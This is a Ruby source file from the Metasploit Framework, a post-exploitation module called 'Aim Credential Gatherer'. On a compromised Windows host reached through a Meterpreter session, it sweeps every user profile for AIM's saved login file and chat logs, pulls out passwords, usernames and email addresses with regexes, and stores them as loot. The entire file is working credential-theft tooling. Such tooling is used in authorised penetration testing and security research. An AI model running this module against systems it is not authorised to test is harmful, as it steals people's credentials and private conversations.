GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/aim.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Post module that hands a static AIM artifact description to the Packrat
# mixin: every user profile found on the session is swept for the files named
# in ARTIFACTS and the configured regexes are applied to them.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::UserProfiles
  include Msf::Post::Windows::Packrat

  # Builds the regex_search list that every AIM artifact carries.
  #
  # The patterns are kept as plain strings carrying inline flags (`(?i-mx:...)`);
  # this module never compiles them itself, they are passed through to
  # run_packrat as part of ARTIFACTS. A fresh array is returned on each call
  # so the two artifact entries do not share one mutable object.
  #
  # @return [Array<Hash>] one entry per extraction, each with a description,
  #   an extraction_type label and the regex strings to apply
  def self.aim_regex_search
    [
      {
        extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
        extraction_type: 'credentials',
        regex: %w[(?i-mx:password.*) (?i-mx:username.*)]
      },
      {
        extraction_description: 'searches for Email TO/FROM address',
        extraction_type: 'Email addresses',
        regex: %w[(?i-mx:to:.*) (?i-mx:from:.*)]
      }
    ]
  end
  private_class_method :aim_regex_search

  # Static description of what Packrat should look for. Both artifacts live
  # under the user's LocalAppData\AIM directory; the only differences between
  # them are the filetypes label, the file name glob and the description, so
  # the common shape is built once from a short table.
  ARTIFACTS = {
    application: 'AIM',
    app_category: 'chats',
    gatherable_artifacts: [
      ['logins', 'aimx.bin', "AIM's saved Username and Passwords"],
      ['chat_logs', '*.html', "AIM's chat logs with date and times"]
    ].map do |filetypes, file_name, description|
      {
        filetypes: filetypes,
        path: 'LocalAppData',
        dir: 'AIM',
        artifact_file_name: file_name,
        description: description,
        credential_type: 'text',
        regex_search: aim_regex_search
      }
    end
  }.freeze

  # Registers module metadata and the datastore options.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Aim Credential Gatherer',
        'Description' => %q{
          This module searches for Aim credentials on a Windows host.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Kazuyoshi Maruta',
          'Daniel Hallsworth',
          'Barwar Salim M',
          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
        ],
        'Platform' => ['win'],
        'SessionTypes' => ['meterpreter'],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => []
        }
      )
    )

    # The ARTIFACTS choices are derived from the filetypes labels declared in
    # the ARTIFACTS constant, with 'All' prepended as the default.
    artifact_types = ARTIFACTS[:gatherable_artifacts].map { |artifact| artifact[:filetypes] }
    artifact_choices = ['All', *artifact_types.uniq]

    register_options(
      [
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', artifact_choices])
      ]
    )
  end

  # Echoes the selected options, then runs the Packrat sweep once per user
  # profile returned by grab_user_profiles.
  #
  # @return [void]
  def run
    print_status('Filtering based on these selections: ')
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")

    # One Packrat pass per profile; the mixin does the file lookup and matching.
    grab_user_profiles.each { |profile| run_packrat(profile, ARTIFACTS) }

    print_status('PackRat credential sweep completed')
  end
end